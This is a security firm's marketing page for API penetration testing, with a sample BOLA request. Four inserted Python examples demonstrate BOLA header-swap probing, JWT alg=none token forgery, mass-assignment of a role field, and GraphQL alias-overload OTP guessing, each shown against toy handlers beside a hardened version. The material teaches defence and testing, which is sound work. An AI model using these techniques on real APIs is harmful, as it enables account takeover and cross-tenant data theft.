Macksofy Technologies
OWASP API Top 10 · REST · GraphQL · gRPC

API Security Testing — REST, GraphQL, gRPC.

Dedicated API security testing for REST, GraphQL and gRPC surfaces. BOLA, BFLA, mass-assignment, JWT and OAuth server-side flows, rate-limit and resource-consumption abuse, GraphQL introspection and depth attacks — by OSWE-certified consultants who treat the API as the product, not the website’s backend.

REST / OpenAPI

Postman · Swagger · OAS 3

GraphQL

Apollo · Hasura · field-authz

gRPC + Protobuf

grpcurl · grpcui · reflection

Auth schemes

OAuth · JWT · mTLS · HMAC

Why API testing is its own discipline

The breach is below the login form.

Web tests look at what a browser does. API tests look at what every client (mobile app, SPA, partner integration, bot) does. That’s a different attack surface and a different test method. BOLA across tenants. Mass-assignment that promotes a regular user to admin. JWT signing flaws. OAuth state omissions. GraphQL alias overloads. These bugs don’t show up in a browser screenshot — they show up in the response body.

  • BOLA / IDOR across multi-tenant flows
  • Mass-assignment via PATCH / PUT bodies
  • JWT alg=none, alg confusion, kid injection
  • GraphQL introspection abuse + depth attacks
  • Shadow APIs and abandoned v1/v2 endpoints
Request (Burp, attacker tab):

GET /api/v1/orders/4815 HTTP/1.1
Host: api.target.com
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9…
X-User-Id: 2911                  ← attacker-controlled header, set to the victim's id
Accept: application/json
Cookie: session=…

The attacker, authenticated as themselves, requests another user's order.

Response:

200 OK
{
  "order_id": 4815,
  "customer_id": 2911,           ← belongs to the OTHER user
  "amount": "₹ 4,82,000",
  "pii": { name, addr, pan, phone }
}

BOLA confirmed · CVSS 9.1 · CWE-639 (Authorization Bypass Through User-Controlled Key). The attacker substitutes an ID, the API trusts it, and cross-tenant data leaks.
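The exchange above, as an added worked example that is not Macksofy's code: a toy in-memory orders API with the handler that trusts the client-supplied X-User-Id header (the header-swap pattern) beside a hardened one that takes identity from the bearer token only, plus the probe a tester runs to detect the leak. It also catches the plainer IDOR where no ownership check exists at all. Tokens, user ids and order records are constructed for the example.

```python
"""Added example (not Macksofy's code): a BOLA probe against a toy in-memory orders API.

Two handlers stand in for the endpoint above. The vulnerable one resolves the caller
from the client-supplied X-User-Id header (the header-swap pattern), so its ownership
check runs against an identity the attacker chose. The hardened one takes identity from
the bearer token only. Tokens, user ids and order records are constructed for the example.
"""

TOKENS = {"tok-victim": 2911, "tok-attacker": 7007}        # constructed: bearer token -> user id
ORDERS = {                                                  # constructed order store
    4815: {"order_id": 4815, "customer_id": 2911, "amount": "4,82,000"},
    4816: {"order_id": 4816, "customer_id": 7007, "amount": "1,200"},
}


def _token_user(headers: dict):
    """Identity the server can actually trust: the user bound to the presented token."""
    return TOKENS.get(headers.get("Authorization", "").replace("Bearer ", "", 1))


def get_order_vulnerable(order_id: int, headers: dict):
    """Authenticates the token, then believes X-User-Id about *who* is asking."""
    if _token_user(headers) is None:
        return 401, None
    caller = int(headers.get("X-User-Id", _token_user(headers)))   # attacker-controlled
    order = ORDERS.get(order_id)
    if order is None or order["customer_id"] != caller:
        return 404, None
    return 200, order


def get_order_hardened(order_id: int, headers: dict):
    """Identity comes from the verified token only; X-User-Id is never read.
    A 404 (not 403) on another user's object avoids confirming that the id exists."""
    caller = _token_user(headers)
    if caller is None:
        return 401, None
    order = ORDERS.get(order_id)
    if order is None or order["customer_id"] != caller:
        return 404, None
    return 200, order


def bola_probe(handler, token: str, object_ids, spoof_ids) -> dict:
    """Tester side. Request every object id as `token`'s user, once plainly and once per
    candidate X-User-Id value. Any 200 whose owner field is not the caller is a BOLA.
    Returns {object_id: [X-User-Id value that leaked it, or '<none>']}."""
    me = TOKENS[token]
    variants = [{}] + [{"X-User-Id": str(s)} for s in spoof_ids]
    leaks = {}
    for oid in object_ids:
        for extra in variants:
            status, body = handler(oid, {"Authorization": f"Bearer {token}", **extra})
            if status == 200 and body["customer_id"] != me:
                leaks.setdefault(oid, []).append(extra.get("X-User-Id", "<none>"))
    return leaks


if __name__ == "__main__":
    print("vulnerable:", bola_probe(get_order_vulnerable, "tok-attacker", ORDERS, [2911]))
    print("hardened:  ", bola_probe(get_order_hardened, "tok-attacker", ORDERS, [2911]))
```

The probe needs two identities and a list of object ids gathered earlier (the tenant-isolation model from scoping and the ids harvested during discovery); a hit where the returned owner is not the caller is the finding, and the X-User-Id value that produced it tells the developer which header to stop trusting.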
Testing methodology

Six phases. Spec to attestation.

A Macksofy API engagement walks the OWASP API Security Top 10 from first request to regulator-ready attestation. Each phase puts BOLA, BFLA, mass-assignment, JWT abuse and resource-consumption tradecraft against your endpoints — with a consultant typing the exploit, not a tool clicking through a YAML config. Findings cross-reference across phases (a shadow endpoint surfaced in Phase 2 becomes a mass-assignment vector in Phase 4, which unlocks a role-elevation chain in Phase 3) so the deliverable reads like an attacker’s logbook, not a scanner export. Every report ships with a Postman / OpenAPI regression suite your CI can re-execute on the next release.

OWASP API Top 10 · 2023 · Postman regression suite · CERT-In format · RBI · SEBI · DPDP mapping
  1. Phase 01 · API inventory & scoping

    • REST + GraphQL + gRPC endpoint inventory from spec, traffic and disassembly
    • Authentication scheme map — Bearer, OAuth, JWT, mTLS, HMAC, session
    • User-role + tenant-isolation model agreement
  2. Phase 02 · Discovery + shadow-API hunt

    • OpenAPI / Postman / Swagger parse
    • Endpoint fuzzing (ffuf, kiterunner) for undocumented routes
    • Old API-version (v1, v2, beta) abandoned-but-live discovery
  3. Phase 03 · Auth at the API layer

    • BOLA + BFLA across roles and tenants
    • JWT alg confusion, alg=none, kid injection, signing-key abuse
    • OAuth flow abuse — state, PKCE, redirect-URI confusion server-side
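The alg=none check from this phase, as an added example that is neither Macksofy's code nor any JWT library's: a verifier that lets the token header choose the verification routine, beside one that pins the algorithm server-side, and the tester-side probe that tells them apart. HS256 is implemented by hand with the standard library so the decision points are visible; the secret and the claims are constructed. Algorithm confusion (an RS256 public key reused as an HS256 secret) and kid injection share the same root cause, a verifier parameterised by attacker-controlled header fields, but need key material that is not shown here.

```python
"""Added example (not Macksofy's or any library's code): JWT alg=none forgery against a
verifier that trusts the token header, beside an algorithm-pinned verifier.

Only the stdlib is used; HS256 is implemented by hand so the verification logic is
visible. The secret, subject and role claims are constructed for the example.
"""
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"   # example value; a real service loads this from a secret store


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(claims: dict, key: bytes) -> str:
    """Server side: a legitimately signed HS256 token."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def forge_alg_none(claims: dict) -> str:
    """Attacker side: no key needed. The header claims alg=none and the signature is empty."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def verify_vulnerable(token: str, key: bytes) -> dict:
    """Selects the verification routine from the attacker-controlled header. 'none' in any
    letter case (as some historic libraries accepted) skips signature checking entirely."""
    h, p, s = token.split(".")
    alg = json.loads(_b64url_decode(h)).get("alg", "")
    if alg.lower() == "none":
        return json.loads(_b64url_decode(p))
    if alg == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(s)):
            return json.loads(_b64url_decode(p))
    raise ValueError("signature verification failed")


def verify_hardened(token: str, key: bytes, expected_alg: str = "HS256") -> dict:
    """The algorithm is fixed by server configuration. The header's alg is compared to it
    and otherwise ignored; an empty signature is rejected before any crypto runs."""
    h, p, s = token.split(".")
    if json.loads(_b64url_decode(h)).get("alg") != expected_alg or not s:
        raise ValueError("algorithm not permitted")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        raise ValueError("signature verification failed")
    return json.loads(_b64url_decode(p))


def is_vulnerable_to_alg_none(verify, key: bytes) -> bool:
    """Tester side: does the target accept an unsigned token with elevated claims?"""
    forged = forge_alg_none({"sub": "2911", "role": "admin"})   # constructed claims
    try:
        return verify(forged, key).get("role") == "admin"
    except ValueError:
        return False


if __name__ == "__main__":
    legit = issue_hs256({"sub": "2911", "role": "user"}, SECRET)
    print("hardened accepts legit token:", verify_hardened(legit, SECRET)["sub"])
    print("vulnerable accepts alg=none: ", is_vulnerable_to_alg_none(verify_vulnerable, SECRET))
    print("hardened accepts alg=none:   ", is_vulnerable_to_alg_none(verify_hardened, SECRET))
```

In a real engagement the forged token goes into the Authorization header of a request whose success is observable (a profile read, an admin route), and the same pin-the-algorithm rule is what the remediation advice asks the developer to turn on in their library.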
  4. Phase 04 · Object + property level testing

    • Mass-assignment via PUT / PATCH bodies
    • Property-level read/write authorization bypass
    • GraphQL field-level authz, introspection abuse, batching attacks
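The mass-assignment probe from this phase, as an added example that is not Macksofy's code: a PATCH handler that binds every property the client sends, beside one that enforces a server-side allow-list, and the tester-side loop that reports which undocumented or privileged properties the server persisted. The user record, the allow-list and the candidate property names are constructed; in an engagement the candidates come from the object's GET representation plus a wordlist of privilege-bearing names (role, tenant_id, is_verified and the like).

```python
"""Added example (not Macksofy's code): a mass-assignment probe for a PATCH endpoint,
with the vulnerable binder beside an allow-listed one.

The store, user record and candidate property names are constructed for the example.
"""
import copy

USERS = {2911: {"id": 2911, "email": "user@example.invalid", "display_name": "User",
                "role": "user", "tenant_id": "t-1"}}          # constructed record
CLIENT_WRITABLE = {"email", "display_name"}                   # server-side allow-list


def patch_user_vulnerable(user_id: int, body: dict) -> dict:
    """Binds every property in the request body straight onto the stored object."""
    USERS[user_id].update(body)
    return USERS[user_id]


def patch_user_hardened(user_id: int, body: dict) -> dict:
    """Rejects (rather than silently drops) any property outside the allow-list, so a
    client that sends `role` gets a 400-style error and the boundary is explicit."""
    rejected = sorted(set(body) - CLIENT_WRITABLE)
    if rejected:
        return {"error": "read-only or unknown properties", "fields": rejected}
    USERS[user_id].update(body)
    return USERS[user_id]


def mass_assignment_probe(handler, user_id: int, candidates: dict) -> dict:
    """Tester side: send each candidate property one at a time beside a harmless change,
    read the object back, and report which candidates the server persisted.
    State is restored between probes so one finding cannot mask another."""
    persisted = {}
    for name, value in candidates.items():
        snapshot = copy.deepcopy(USERS[user_id])
        handler(user_id, {"display_name": snapshot["display_name"], name: value})
        stored = USERS[user_id]                          # the 'GET after PATCH' read-back
        if stored.get(name) == value and snapshot.get(name) != value:
            persisted[name] = value
        USERS[user_id] = snapshot
    return persisted


# Constructed candidates: existing privileged fields plus a name the API never documented.
CANDIDATES = {"role": "admin", "tenant_id": "t-2", "is_verified": True}

if __name__ == "__main__":
    print("vulnerable persisted:", mass_assignment_probe(patch_user_vulnerable, 2911, CANDIDATES))
    print("hardened persisted:  ", mass_assignment_probe(patch_user_hardened, 2911, CANDIDATES))
```

Probing one property per request matters: a body that sends role and tenant_id together tells you a bypass exists but not which field the back-end forgot to filter, and the read-back after each PATCH is what distinguishes a field the server echoed from one it actually stored.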
  5. Phase 05 · Resource consumption + abuse

    • Rate-limit and quota bypass
    • GraphQL depth, complexity and alias attacks
    • Bulk endpoint + business-flow abuse (signup, password reset, OTP)
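The GraphQL depth and alias checks from this phase, as an added example that is neither Macksofy's code nor any GraphQL server's: a single-pass counter over a query document that measures selection-set depth and alias count, a builder for the alias-overload request (many OTP guesses in one HTTP request, which a per-request rate limit counts as one attempt), and the server-side limit check that rejects it. The queries, field names, phone number and limits are all constructed.

```python
"""Added example (not Macksofy's or any GraphQL server's code): depth and alias analysis
of GraphQL documents, used both to build an alias-overload request and to show the limit
check that stops it. Queries, field names and limits are constructed for the example.
"""


def analyse(document: str) -> dict:
    """Scan the document once. depth = deepest nesting of selection-set braces;
    aliases = `name:` pairs at selection level. Braces and colons inside argument
    lists `( … )`, string literals and `#` comments are skipped so they cannot skew it."""
    depth = max_depth = paren = aliases = 0
    i, n = 0, len(document)
    while i < n:
        c = document[i]
        if c == '"':                          # skip a string literal (escapes honoured);
            i += 1                            # block strings collapse to the same effect
            while i < n and document[i] != '"':
                i += 2 if document[i] == "\\" else 1
        elif c == "#":                        # comment runs to end of line
            while i < n and document[i] != "\n":
                i += 1
        elif c == "(":
            paren += 1
        elif c == ")":
            paren -= 1
        elif paren == 0:
            if c == "{":
                depth += 1
                max_depth = max(max_depth, depth)
            elif c == "}":
                depth -= 1
            elif c == ":":                    # `alias: field` at selection level
                aliases += 1
        i += 1
    return {"depth": max_depth, "aliases": aliases}


def check_limits(document: str, max_depth: int = 8, max_aliases: int = 10) -> list:
    """Server side: reasons to reject the document; an empty list means accept."""
    stats = analyse(document)
    reasons = []
    if stats["depth"] > max_depth:
        reasons.append(f"depth {stats['depth']} > {max_depth}")
    if stats["aliases"] > max_aliases:
        reasons.append(f"aliases {stats['aliases']} > {max_aliases}")
    return reasons


def build_alias_overload(count: int) -> str:
    """Tester side: `count` OTP guesses in ONE HTTP request. A per-request rate limit sees
    a single attempt; only a per-alias / per-field limit or a complexity budget stops it."""
    lines = [f'  g{i}: verifyOtp(phone: "+910000000000", code: "{i:04d}") {{ ok }}'
             for i in range(count)]
    return "mutation {\n" + "\n".join(lines) + "\n}"


# Constructed: a legitimate nested query whose argument braces and colons must not count.
NESTED_QUERY = """
query Orders($id: ID!) {
  user(id: $id) {
    orders(first: 10, filter: {status: "PAID"}) {
      edges { node { items { sku } } }
    }
  }
}
"""

if __name__ == "__main__":
    print("nested:", analyse(NESTED_QUERY), check_limits(NESTED_QUERY))
    overload = build_alias_overload(50)
    print("overload:", analyse(overload), check_limits(overload))
```

Depth here counts selection sets, so the same counter exposes the recursive `friends { friends { friends … } }` pattern, and the alias count is the metric that rate limiting must be keyed on (per resolver invocation, not per HTTP request) for the OTP and login mutations listed under business-flow abuse.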
  6. Phase 06 · Reporting + retest

    • OWASP API Top 10 attestation + per-finding PoC
    • Postman / OpenAPI test collection so dev can re-validate
    • CVSS 3.1 scoring + free retest within 30 days
OWASP API Security Top 10 · 2023

Tap a category. See manual vs scanner coverage.

Side-by-side coverage delta per OWASP API category. The gap between the two bars is the work that justifies hiring a consultant instead of buying a subscription.

API1 · BOLA (Broken Object Level Authorization)

Object-level authz bypass via swapped IDs — cross-tenant data leaks

Manual coverage 96% · Scanner coverage 12%

Coverage % per Macksofy 2025 API engagement telemetry. The scanner-shop gap is the work humans do.

Case studies

What we found in production APIs.

B2B SaaS (Series-B, India)

Multi-tenant SaaS REST + GraphQL API

Finding · BOLA across tenants via tenant-id header swap → cross-tenant data exposure

Critical — fixed pre enterprise contract signing

Risk severity · Critical
Healthcare API (UAE)

Patient portal FHIR API

Finding · JWT alg=none accepted; account takeover at scale

Critical — fixed within 24 hours of report delivery

Risk severity · Critical
Open-banking aggregator (India)

Account aggregator REST API + OAuth flow

Finding · Mass-assignment via PATCH /accounts → arbitrary role elevation

Critical — fixed pre RBI System Audit

Risk severity · Critical
Why Macksofy for API security

The API pentest your scanner can’t run.

Generic API scanners run a corpus of known payloads against the routes they can already see. The findings that actually close a regulator audit — BOLA across tenants, mass-assignment that elevates a regular user to admin, JWT alg=none accepted in production — come from a human who reasoned about your authorisation model, not from a tool that pattern-matched your response bodies.

We break the auth model first.

JWT alg confusion, kid injection, OAuth state omissions, mTLS misuse, HMAC replay — every auth scheme on your stack gets its own phase, not a check-box. Our OSWE-trained team has shipped CVEs against well-known auth libraries. If the auth holds, the rest of the engagement gets cheaper.

We hunt the APIs you forgot you shipped.

Old v1, v2 and beta routes still answering traffic. Admin paths discoverable from a JS bundle. Partner-only endpoints reachable from the internet. Shadow-API discovery is its own phase, with kiterunner, ffuf and live traffic-capture run in parallel.

REST, GraphQL, gRPC — all three.

REST + OpenAPI, GraphQL (Apollo, Hasura, federated), gRPC + Protobuf with reflection, server-sent events, websockets. We test the protocols your app actually emits, not the subset the scanner happens to support.

We attack the property, not just the endpoint.

Mass-assignment via PATCH and PUT bodies. GraphQL field-level authz across roles. Partial-update body abuse. We find the property your back-end forgot to filter, then prove the role-elevation chain it unlocks.

OWASP API Top 10 attestation, on paper.

Explicit per-category attestation against the 2023 OWASP API Security Top 10, plus a Postman / OpenAPI regression collection your CI can re-execute on every release. Your auditor reads “API1 verified”, not “OWASP-aligned”.

Free retest. Closed, not pending.

One free verification cycle within 30 days of developer sign-off. We rerun the affected phases on the patched build, re-execute the Postman regression, and reissue the attestation — so the auditor sees ‘closed’, never ‘remediation pending’.

Mutual NDA is step zero of every engagement. Specs, traffic captures and findings live on Macksofy infrastructure for the engagement window plus 90 days, then are securely destroyed against a CERT-In-acceptable retention policy.

Talk to an API lead
Toolchain

Burp + Postman + custom Burp extensions.

We ship Burp extensions for GraphQL recon, JWT abuse, BOLA scanning and gRPC reflection that aren’t on the BApp store — built from years of running this engagement against multi-tenant fintech and SaaS targets.

Tools we operate
Burp Suite Pro · Caido · Postman + Newman · ffuf · kiterunner (API route fuzzing) · GraphQL Voyager · InQL (GraphQL recon) · JWT_tool · grpcurl + grpcui · Custom Burp extensions
What clients say · Trusted India + UAE

Rated 4.9 ★ from 612 client reviews.

CERT-In Empanelled
Govt of India · MeitY
EC-Council ATC
Authorized Training
ISO 27001 Certified
Info Security Mgmt
We've worked with three Big 4 firms before Macksofy. None found what their team did in our payments stack. The most actionable report we've received in a decade.
Aisha Khan
Information Security Manager · Listed Fintech · BKC, Mumbai
The CHFI training Macksofy delivered for our cyber cell raised investigation quality measurably. Practical, India-context-aware, and respectful of our operational realities.
Inspector K. Joshi
Cyber Cell · Maharashtra Police · Mumbai
Came in with zero security background. 5 weeks later I was running Burp Suite and Metasploit confidently. Cleared CEH on the first attempt.
Vivek Iyer
DevSecOps Lead · Healthcare SaaS · Hyderabad
FAQ

Things people ask before signing.

Extensively. Introspection abuse, depth and complexity attacks, batching, alias overloading, and field-level authorization issues that REST-trained testers miss are a dedicated track in every GraphQL engagement.
Talk to us

Get a fixed-price proposal in 48 hours.

Tell us about your security need — pentest, audit, training or a wider engagement. A senior consultant will reply within a few business hours.

CERT-In Empanelled
Information Security Auditor · India
  • CERT-In Empanelled
  • EC-Council ATC · CompTIA Authorized
  • 20,000+ professionals trained
  • India + UAE engagements

By submitting this form you agree to be contacted by Macksofy. We typically respond within a few business hours and never share your details. Protected by Cloudflare Turnstile and rate limiting.